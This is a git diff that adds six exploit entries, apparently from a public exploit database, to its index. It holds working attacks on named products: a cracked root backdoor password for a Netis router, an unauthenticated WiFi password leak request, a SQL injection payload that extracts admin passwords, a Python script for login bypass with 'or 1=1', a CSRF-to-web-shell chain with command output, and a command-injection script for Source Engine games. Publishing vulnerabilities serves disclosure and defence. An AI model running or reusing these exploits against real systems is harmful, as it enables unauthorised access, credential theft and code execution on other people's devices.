diff --git a/exploits/hardware/webapps/48382.txt b/exploits/hardware/webapps/48382.txt
new file mode 100644
index 000000000..12bc9d912
--- /dev/null
+++ b/exploits/hardware/webapps/48382.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
+# Date: 2020-04-25
+# Author: Besim ALTINOK
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
+# Version: V1.2.32533
+# Tested on: Netis E1+ V1.2.32533
+# Credit: İsmail BOZKURT
+-----------------------------
+
+*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*
+
+
+Created directory: /home/pentestertraining/.john
+Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: MaxLen = 13 is too large for the current hash type, reduced
+to 8*realtek (root)*
+1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48384.txt b/exploits/hardware/webapps/48384.txt
new file mode 100644
index 000000000..a1f8c1171
--- /dev/null
+++ b/exploits/hardware/webapps/48384.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Netis E1+ 1.2.32533 - Unauthenticated WiFi Password Leak
+# Date: 2020-04-25
+# Author: Besim ALTINOK
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
+# Version: V1.2.32533
+# Tested on: Netis E1+ V1.2.32533
+# Credit: İsmail BOZKURT
+-----------------------------
+
+HTTP Request
+-------------------------------------------
+GET //netcore_get.cgi HTTP/1.1
+Host: netisext.cc
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
+Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: homeFirstShow=yes
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+Detail of the HTTP Response:
+-------------------------------------------
+hange_name':'[ ]','ddns_domain':'','ddns_info':'[ ]','time_now':'01/14/2015
+09:58:51','timezone':'-8
+1','time_type':'1','daylight_save':'1','time_server':'65.55.56.206','time_date':'2015','time_date2':'1','time_date3':'14','time_time':'9','time_time2':'58','time_time3':'51','old_user':'','def_pwd_flag':'1','old_pwd':'','wakeup_mac':'00:00:00:00:00:00','rp_config_status':'35','rp_client_status':'3','rp_ap_ssid':'ExampleSSID','rp_ap_password':'WiFiPass123','rp_ap_users':'1','rp_client_ssid':'TestSSID','rp_client_bssid':'98:e7:f5:ab:95:ad','rp_client_password':'WiFiPass123','rp_client_time':'357','rp_client_signals':'65','rp_client_speeds':'117','rp_roaming_onoff':'16','rp_soon_ssid':'TestSSID','rp_soon_password':'WiFiPass123','rr_current_mode':'1','rp_diagnose_status':'0',"statistics_list":[{'type':'LAN','tx_pack':'0','rx_pack':'0','t
\ No newline at end of file
diff --git a/exploits/php/webapps/48381.txt b/exploits/php/webapps/48381.txt
new file mode 100644
index 000000000..a8b0b3b59
--- /dev/null
+++ b/exploits/php/webapps/48381.txt
@@ -0,0 +1,52 @@
+# Exploit Title: PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
+# Date: 2020-04-24
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.php-fusion.co.uk/home.php
+# Software Link: https://sourceforge.net/projects/php-fusion/files/PHP-Fusion%20Archives/9.x/PHP-Fusion%209.03.50.zip/download
+# Version: v9.03.50
+# Tested on: Xampp
+# Credit: İsmail BOZKURT and AkkuS
+
+-------------------------------------------------------------------------------------------------
+Description
+---
+- This system does not check the file extension when user upload photo for
+avatar :). So you can upload PHP file like:
+
+Content of the file
+--
+Sample PHP code:
+
+Name of the file:
+---
+Sample PHP File name: tester.php
+
+- When you want to try to upload the image to the avatar, just, try to
+change the file name and content.
+
+----------------------------------------------------------------------------------------
+Vulnerable code section in the UserFieldsInput.inc
+----------------------------------------------------------
+ private function _setUserAvatar() {
+ if (isset($_POST['delAvatar'])) {
+ if ($this->userData['user_avatar'] != "" &&
+file_exists(IMAGES."avatars/".$this->userData['user_avatar']) &&
+is_file(IMAGES."avatars/".$this->userData['user_avatar'])) {
+ unlink(IMAGES."avatars/".$this->userData['user_avatar']);
+ }
+ $this->data['user_avatar'] = '';
+ }
+ if (isset($_FILES['user_avatar']) &&
+$_FILES['user_avatar']['name']) { // uploaded avatar
+ if (!empty($_FILES['user_avatar']) &&
+is_uploaded_file($_FILES['user_avatar']['tmp_name'])) {
+ $upload = form_sanitizer($_FILES['user_avatar'], '',
+'user_avatar');
+ if (isset($upload['error']) && !$upload['error']) {
+ // ^ maybe use empty($upload['error']) also can but
+maybe low end php version has problem on empty.
+ $this->data['user_avatar'] = $upload['image_name'];
+ }
+ }
+ }
+ }
\ No newline at end of file
diff --git a/exploits/php/webapps/48383.txt b/exploits/php/webapps/48383.txt
new file mode 100644
index 000000000..241aaaa32
--- /dev/null
+++ b/exploits/php/webapps/48383.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
+# Exploit Author : Majid kalantari
+# Date: 2020-04-26
+# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
+# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
+# Version: -
+# Tested on: Windows 10
+# CVE: N/A
+===============================================
+
+# vulnerable file: product.php
+
+# vulnerable parameter : p
+
+# payload :
+http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
+!
+
+#Description: ($product_id input is not safe)
+
+Line 46:
+$product_id = $_GET['p'];
+$sql = " SELECT * FROM products ";
+$sql = " SELECT * FROM products WHERE product_id = $product_id";
+===============================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48385.txt b/exploits/php/webapps/48385.txt
new file mode 100644
index 000000000..3db807800
--- /dev/null
+++ b/exploits/php/webapps/48385.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Online Course Registration 2.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-04-25
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/online-course-registration-free-download/
+# Version: 2.0
+# Tested on: Kali Linux x64 5.4.0
+# CVE : N/A
+
+#There are multiple SQL injection vulnerabilities in Online Course Registration #PHP script:
+
+#./check_availability.php: $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'");
+#./check_availability.php: $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'");
+#./check_availability.php: $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'");
+#./change-password.php:$sql=mysqli_query($con,"SELECT password FROM students where password='".md5($_POST['cpass'])."' && studentRegno='".$_SESSION['login']."'");
+#./admin/check_availability.php: $result =mysqli_query($con,"SELECT StudentRegno FROM students WHERE StudentRegno='$regno'");
+#./admin/change-password.php:$sql=mysqli_query($con,"SELECT password FROM admin where password='".md5($_POST['cpass'])."' && username='".$_SESSION['alogin']."'");
+#./admin/index.php:$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
+#./index.php:$query=mysqli_query($con,"SELECT * FROM students WHERE StudentRegno='$regno' and password='$password'");
+#./includes/header.php: $ret=mysqli_query($con,"SELECT * from userlog where studentRegno='".$_SESSION['login']."' order by id desc limit 1,1");
+#./pincode-verification.php:$sql=mysqli_query($con,"SELECT * FROM students where pincode='".trim($_POST['pincode'])."' && StudentRegno='".$_SESSION['login']."'");
+
+#It is also possible to bypass the authentication in the two login pages:
+#!/usr/bin/python3
+try:
+ from termcolor import colored
+ from colorama import init
+ import argparse
+ import requests
+except:
+ print("Please run pip3 install termcolor,colorama,argparse,requests")
+
+init()
+
+symbol_green=colored("[+]", 'green')
+symbol_red=colored("[-]", 'red')
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', help='The URL of the target.')
+args = parser.parse_args()
+
+adminurl = args.url + '/onlinecourse/admin/'
+
+
+
+def main():
+ initial='Online Course Registration Authentication Bypass in %s' % ( args.url ) + "\n"
+ print(colored(initial, 'yellow'))
+ sess = requests.session()
+ data_login = {
+ 'username': "admin' or 1=1 -- ",
+ 'password': 'whatever',
+ 'submit': ''
+}
+ try:
+ req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True)
+ resp_code = req.status_code
+ except:
+ print(symbol_red+" The request didn't work!\n")
+ exit()
+ if resp_code == 200 and "document.chngpwd.cpass.value" in req.text:
+ print(symbol_green+" Authentication bypassed for admin user!\n")
+ print(symbol_green+" To test this manually, visit: " + adminurl+ " and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n")
+
+ else:
+ print(symbol_red+" Fail!")
+
+main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48386.txt b/exploits/php/webapps/48386.txt
new file mode 100644
index 000000000..99e62d950
--- /dev/null
+++ b/exploits/php/webapps/48386.txt
@@ -0,0 +1,170 @@
+# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-04-26
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.maiansupport.com
+# Software Link: https://www.maiansupport.com/zip.html
+# Version: v4.3
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+----------------------------------------------
+
+Here is the Detail:
+--------------------------------------------------
+This product is unprotected against CSRF vulnerabilities. With this attack,
+you can add an admin account to the system. In addition, you can add files
+from the F.A.Q field as admin.There are no file restrictions here.
+Therefore, you can upload a PHP file here with CSRF.
+
+If you want, you can add an admin account first and then access the system
+and upload files.
+Or you can upload files with direct admin rights.
+
+---------------------------------------------------
+CSRF PoC - 1 (Add Administrator user)
+-------------------------------------
+
+
+
+
+
+
+
+
+- After the Add admin account, you can upload the PHP file.
+
+CSRF PoC 2 - ( Directly, File Upload)
+----------------------------------------------------
+
+
+
+
+
+
+
+
+
+HTTP Request:
+-----------------------------------------------------------------------------------------
+GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
+Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec;
+bp_ut_session={"pageviews":1,"referrer":"
+http://localhost/olms/library/assets/js/images/","landingPage":"
+http://localhost/olms/library/assets/js/images/sort_asc.html
+","started":1587817504988};
+HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6
+Upgrade-Insecure-Requests: 1
+
+HTTP Response:
+-------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sun, 26 Apr 2020 12:15:31 GMT
+Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev
+Perl/v5.16.3
+X-Powered-By: PHP/7.2.29
+Content-Length: 39
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+shell.php
+shell_test.php
+shell_test.php
\ No newline at end of file
diff --git a/exploits/windows/local/48387.txt b/exploits/windows/local/48387.txt
new file mode 100644
index 000000000..3db90cdc7
--- /dev/null
+++ b/exploits/windows/local/48387.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
+# Date: 2020-04-27
+# Exploit Author: 0xEmma/BugByte/SebastianPC
+# Vendor Homepage: https://www.valvesoftware.com/en/
+# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
+# Tested on: MacOS 15.3
+# CVE : N/A
+
+import os, random, sys
+banner = """
+:'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########:
+'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
+ ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
+. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
+:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
+'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
+. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::
+:......::::.......::::.......::::......::::.......:::..::::..:::......:::::..:::::
+"""
+print(banner)
+
+
+if os.name == "posix":
+ command = str(input("Code to run? "))
+ payload = '"; ' + command + '; echo "'
+ f = open("/tmp/hl2_relaunch", "w")
+
+ f.write(payload)
+ f.close()
+
+if os.name == "nt":
+ print("Windows based OS's not supported, see CVE-2020-12242")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b1b0f9065..cd1147589 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11039,6 +11039,7 @@ id,file,description,date,author,type,platform,port
48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
+48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42615,3 +42616,9 @@ id,file,description,date,author,type,platform,port
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,
+48381,exploits/php/webapps/48381.txt,"PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload",2020-04-27,Besim,webapps,php,
+48382,exploits/hardware/webapps/48382.txt,"Netis E1+ 1.2.32533 - Backdoor Account (root)",2020-04-27,Besim,webapps,hardware,
+48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,
+48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
+48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
+48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,